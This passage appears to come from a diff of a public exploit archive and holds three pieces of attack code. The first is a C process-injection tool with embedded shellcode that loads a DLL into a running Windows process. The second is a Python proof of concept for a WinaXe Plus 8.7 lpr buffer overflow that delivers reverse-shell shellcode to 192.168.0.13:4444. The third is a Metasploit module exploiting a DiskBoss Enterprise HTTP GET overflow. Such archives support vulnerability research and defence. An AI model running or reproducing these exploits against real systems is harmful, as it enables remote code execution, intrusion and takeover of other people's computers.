204: 48 83 f8 01 cmp $0x1,%rax
208: 0f 85 5b ff ff ff jne 169 <__exit>
20e: 66 ba a8 02 mov $0x2a8,%dx
212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 31 d2 xor %rdx,%rdx
21b: 48 83 ec 58 sub $0x58,%rsp
21f: 4c 89 e9 mov %r13,%rcx
222: 52 push %rdx
223: 52 push %rdx
224: 41 58 pop %r8
226: 66 ba 40 03 mov $0x340,%dx
22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
22e: 49 01 f9 add %rdi,%r9
231: 5a pop %rdx
232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
241: ff d3 callq *%rbx
243: e8 21 ff ff ff callq 169 <__exit>
*/
#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>
char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\x54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";
void inject(DWORD );
int main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <program name>",a[0]);
return 0;
}
BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;
snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}
pe32.dwSize=sizeof(pe32);
if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}
do
{
if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
{
f=TRUE;
break;
}
}while(Process32Next(snap,&pe32));
if(!f)
{
printf("No infomation found about \"%s\" ",a[1]);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}
return 0;
}
void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;
phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}
shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
}
WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");
h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}
}

64
platforms/windows/remote/41073.py Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow
# Date: 2017-01-16
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip
# Software Link: http://www.labf.com/download/winaxep-ok.html
# Version: 8.7
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
#Start the fake LPD daemon -> Add the network printer -> Close
import socket
# WinAxe Plus 8.7 - lpr remote buffer overflow
# Author: Peter Baris
# Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
#reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters \x00\x0a\x0d
shell = ("\xb8\xb1\x79\xd9\xb5\xdb\xdc\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x52\x83\xeb\xfc\x31\x43\x0e\x03\xf2\x77\x3b\x40\x08\x6f\x39"
"\xab\xf0\x70\x5e\x25\x15\x41\x5e\x51\x5e\xf2\x6e\x11\x32\xff"
"\x05\x77\xa6\x74\x6b\x50\xc9\x3d\xc6\x86\xe4\xbe\x7b\xfa\x67"
"\x3d\x86\x2f\x47\x7c\x49\x22\x86\xb9\xb4\xcf\xda\x12\xb2\x62"
"\xca\x17\x8e\xbe\x61\x6b\x1e\xc7\x96\x3c\x21\xe6\x09\x36\x78"
"\x28\xa8\x9b\xf0\x61\xb2\xf8\x3d\x3b\x49\xca\xca\xba\x9b\x02"
"\x32\x10\xe2\xaa\xc1\x68\x23\x0c\x3a\x1f\x5d\x6e\xc7\x18\x9a"
"\x0c\x13\xac\x38\xb6\xd0\x16\xe4\x46\x34\xc0\x6f\x44\xf1\x86"
"\x37\x49\x04\x4a\x4c\x75\x8d\x6d\x82\xff\xd5\x49\x06\x5b\x8d"
"\xf0\x1f\x01\x60\x0c\x7f\xea\xdd\xa8\xf4\x07\x09\xc1\x57\x40"
"\xfe\xe8\x67\x90\x68\x7a\x14\xa2\x37\xd0\xb2\x8e\xb0\xfe\x45"
"\xf0\xea\x47\xd9\x0f\x15\xb8\xf0\xcb\x41\xe8\x6a\xfd\xe9\x63"
"\x6a\x02\x3c\x23\x3a\xac\xef\x84\xea\x0c\x40\x6d\xe0\x82\xbf"
"\x8d\x0b\x49\xa8\x24\xf6\x1a\x17\x10\xf8\xd7\xff\x63\xf8\xf6"
"\xa3\xea\x1e\x92\x4b\xbb\x89\x0b\xf5\xe6\x41\xad\xfa\x3c\x2c"
"\xed\x71\xb3\xd1\xa0\x71\xbe\xc1\x55\x72\xf5\xbb\xf0\x8d\x23"
"\xd3\x9f\x1c\xa8\x23\xe9\x3c\x67\x74\xbe\xf3\x7e\x10\x52\xad"
"\x28\x06\xaf\x2b\x12\x82\x74\x88\x9d\x0b\xf8\xb4\xb9\x1b\xc4"
"\x35\x86\x4f\x98\x63\x50\x39\x5e\xda\x12\x93\x08\xb1\xfc\x73"
"\xcc\xf9\x3e\x05\xd1\xd7\xc8\xe9\x60\x8e\x8c\x16\x4c\x46\x19"
"\x6f\xb0\xf6\xe6\xba\x70\x06\xad\xe6\xd1\x8f\x68\x73\x60\xd2"
"\x8a\xae\xa7\xeb\x08\x5a\x58\x08\x10\x2f\x5d\x54\x96\xdc\x2f"
"\xc5\x73\xe2\x9c\xe6\x51")
#100299DD - CALL ESP in xwpdllib.dll
buffer="A"*512+"\xdd\x99\x02\x10"+"\x90"*32+shell
port = 515
s = socket.socket()
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
print 'Listening on LPD port: '+str(port)
while True:
conn, addr = s.accept()
conn.send(buffer)
conn.close()

131
platforms/windows/remote/41079.rb Executable file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
caused by improper bounds checking of the request path in HTTP GET
requests sent to the built-in web server. This module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan' # Metasploit module
],
'References' =>
[
['EDB', '40869']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20",
'Space' => 2000
},
'Targets' =>
[
[
'Automatic Targeting',
{
'auto' => true
}
],
[
'DiskBoss Enterprise v7.4.28',
{
'Offset' => 2471,
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
}
],
[
'DiskBoss Enterprise v7.5.12',
{
'Offset' => 2471,
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Dec 05 2016',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /DiskBoss Enterprise/
return Exploit::CheckCode::Detected
end
else
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if target['auto']
mytarget = nil
print_status('Automatically detecting the target...')
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
mytarget = targets[1]
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
mytarget = targets[2]
end
end
if !mytarget
fail_with(Failure::NoTarget, 'No matching target')
end
print_status("Selected Target: #{mytarget.name}")
end
sploit = make_nops(21)
sploit << payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
end
end